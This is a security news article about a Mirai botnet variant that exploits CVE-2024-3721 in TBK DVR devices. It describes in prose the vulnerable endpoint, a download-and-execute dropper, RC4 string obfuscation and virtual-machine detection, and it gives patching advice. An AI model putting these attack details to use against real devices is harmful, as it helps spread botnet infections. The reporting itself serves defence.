New Mirai Botnet Variant Exploits TBK DVR Vulnerability to Deploy Malicious Code

Cybersecurity researchers have discovered a new variant of the notorious Mirai botnet that exploits a critical vulnerability in TBK DVR devices to deploy malicious code remotely.

The attacks leverage CVE-2024-3721, which allows unauthorized system command execution on digital video recording systems commonly used for surveillance purposes.

This latest campaign demonstrates how cybercriminals continue to adapt legacy malware frameworks to target Internet of Things (IoT) devices with enhanced evasion capabilities.

The attack vector centers on CVE-2024-3721, a vulnerability that enables remote code execution on TBK DVR devices without proper authentication.

Security analysts monitoring honeypot systems identified malicious POST requests specifically crafted to exploit this Vulnerability.

The attackers send a targeted request to the vulnerable endpoint /device.rsp containing encoded shell commands that download and execute an ARM32 binary payload.

The malicious payload consists of a streamlined shell script that performs several critical actions: it navigates to the temporary directory, removes any existing malware files, downloads a new binary from a remote server, grants execution permissions, and launches the malware with specific parameters.

Unlike traditional botnet infections that include reconnaissance phases to determine system architecture, this campaign specifically targets ARM32-based DVR devices, eliminating the need for preliminary system surveys.

The exploitation technique demonstrates a sophisticated understanding of the target infrastructure, as DVR devices typically run on ARM32 processors and have predictable system configurations.

This targeted approach allows attackers to maximize infection efficiency while minimizing detection risks.

The global linked list with decrypted data is accessed whenever the malware needs particular strings.

Enhanced Mirai Variant Features

This DVR-focused Mirai variant incorporates several advanced features not found in the original botnet source code released nearly a decade ago.

The malware implements RC4 encryption for string obfuscation, using an XOR-encrypted key that decrypts to reveal the value used for data protection.

This encryption mechanism helps evade signature-based detection systems and complicates reverse engineering efforts.

The malware includes comprehensive anti-analysis capabilities designed to detect virtualized environments and emulation systems.

It systematically examines running processes by accessing the Linux proc filesystem, specifically searching for VMware or QEMU-arm indicators that would suggest execution within a security research environment.

Additionally, the botnet verifies that it operates from expected directory locations based on a hardcoded allowlist.

These evasion techniques represent a significant evolution from earlier Mirai variants, indicating that cybercriminal groups are investing in more sophisticated anti-analysis capabilities to protect their malware investments and extend operational lifespans.

Security Recommendations

Telemetry data reveals that infections are concentrated in China, India, Egypt, Ukraine, Russia, Turkey, and Brazil, with researchers identifying over 50,000 exposed DVR devices vulnerable to this attack vector.

The widespread availability of unpatched devices provides attackers with substantial opportunities for botnet expansion and distributed denial-of-service (DDoS) attack capabilities.

Security experts recommend immediate patching of vulnerable TBK DVR devices and implementation of factory resets for potentially compromised systems.

Since many IoT devices lose malware persistence after reboot due to firmware limitations, regular device restarts can provide temporary protection.

Organizations should prioritize network segmentation and monitoring to detect unusual traffic patterns indicative of botnet communications.

The campaign underscores the critical importance of maintaining updated firmware on IoT devices and implementing robust security monitoring for internet-connected surveillance equipment.

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.